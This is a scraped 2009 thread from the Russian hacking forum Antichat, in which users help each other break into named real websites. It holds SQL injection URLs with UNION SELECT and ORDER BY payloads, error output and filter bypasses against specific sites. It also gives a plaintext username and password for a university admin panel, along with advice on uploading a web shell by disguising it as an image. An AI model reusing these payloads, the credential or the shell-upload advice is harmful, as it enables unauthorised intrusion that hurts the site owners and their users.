Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.03.2009, 11:01
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
2 Imperrous
Мне кажется что там вообще нет sql inj. ошибки работы скрипта.
|
|
|
18.03.2009, 11:36
|
|
Познающий
Регистрация: 28.10.2008
Сообщений: 43
Провел на форуме:
117557
Репутация:
125
|
|
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
|
|
|
|
18.03.2009, 12:56
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573
Репутация:
185
|
|
Сообщение от HIVER
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
Тут к information_schema нет прав. Это значит, надо брутить имена талиц и столбцов. Я б SIPTом пробежал, по словарю.
|
|
|
|
18.03.2009, 15:27
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.
http://www.bookstreet.ru/prod_show.php?object_uid=2'
Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)
|
|
|
|
18.03.2009, 16:11
|
|
Новичок
Регистрация: 15.12.2008
Сообщений: 11
Провел на форуме:
36737
Репутация:
6
|
|
помогите раскрутить (:
http://www.danieldefo.ru/gallery.html?top=1'
Она слепая?)
|
|
|
|
18.03.2009, 16:22
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
http://siovizcenter.ucsd.edu/admin/
rnewman:hot98DOG
Как сюда шелл залить? Возможно?
|
|
|
|
18.03.2009, 16:32
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.
http://www.bookstreet.ru/prod_show.php?object_uid=2'
Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)
http://www.bookstreet.ru/prod_show.php?object_uid=2+order+by+2--
если больше 2 - то ошибка
The ORDER BY position number 3 is out of range of the number of items in the select list.
а дальше вот что
'=' - режет
'select' -режет (видно из запроса http://www.bookstreet.ru/prod_show.php?object_uid=2+union+select+1,2'-- )
Unclosed quotation mark before the character string '2 union 1,2\' '.
как видно SELECT в запросе убран
тк = режется использовать можно <>
http://www.bookstreet.ru/prod_show.php?object_uid=2+and+1<>@@version--
а дальше читай тут
http://injection.rulezz.ru/MSSQL-ASP-Injection.html
|
|
|
|
18.03.2009, 16:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
+++AndreyDevil+++, не смотрел. но попробуй залить как картинку, или побалуйся с расширением файла.
sj666, какая ж она слепая?))
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
версия бд - 4.0.27-log. а инф.схема появляеться только в пятой.
Последний раз редактировалось faza02; 18.03.2009 в 16:38..
|
|
|
|
18.03.2009, 16:36
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
faza02,дело в том что он заливает .php но при переходе link становится такого вида http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=223 и предлагает мне скачать шелл )
|
|
|
|
18.03.2009, 16:42
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
значит ищи в attachements ... я щас просто на работе, был бы дома проверил бы сам все ...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
